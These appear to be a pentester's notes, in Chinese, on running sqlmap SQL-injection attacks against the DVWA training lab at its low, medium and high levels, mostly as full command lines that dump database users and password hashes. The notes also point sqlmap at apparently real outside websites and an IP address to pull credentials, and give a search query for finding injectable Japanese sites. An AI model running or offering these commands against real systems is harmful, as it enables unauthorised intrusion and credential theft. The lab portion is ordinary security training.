0x01
bp靶机抓包设置:火狐浏览器DVWA环境抓包,
url栏输入:about:config
network.proxy.allow_hijacking_localhost
值改为true
0x02
sqlmap dvwa三个安全级别打靶
初级有cookies,设置一下即可。
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62 --batch
--forms
sqlmap -u "http://117.41.229.122:8003/?id=1" --columns -T admin
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
cookies:PHPSESSID:"d4bqtmj0c1sa2ploo0dqupke2c"
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --dbs
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --current-db
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --users --passwords
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa --tables
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users --columns
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users -C "user,password" --dump
外网 不太行,结合了一下tamper脚本也不行
sqlmap.py -u "http://www. .net/productInfo.asp?ID=565" --batch -risk 3 level 5 --identify-waf --tamper "space2morehash.py"
sqlmap.py -u "http://www.idcsol.com/solution.asp?ID=1" --batch --dbs
sqlmap.py -u "http://www.idcsol.com/solution.asp?ID=15" --batch --users --passwords
sqlmap.py -u "http://www.idcsol.com/showSuccess.asp?ID=15" --batch --users --passwords
http://www.idcsol.com/solution.asp?ID=3
检索了一下日本的:inurl:conpany.asp?id= site:jp
中级mid
有个下拉框,将地址和cookie分开。
PHPSESSID:"d4bqtmj0c1sa2ploo0dqupke2c"
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --dbs
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --current-db
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --users
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --current-user
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --passwords
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa --tables
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users --columns
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users -C "user,password" --dump
high
增加了一个弹出页地址。
PHPSESSID:"d4bqtmj0c1sa2ploo0dqupke2c"
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --dbs
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --users --passwords
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c"--batch -D dvwa --tables
浙公网安备 33010602011771号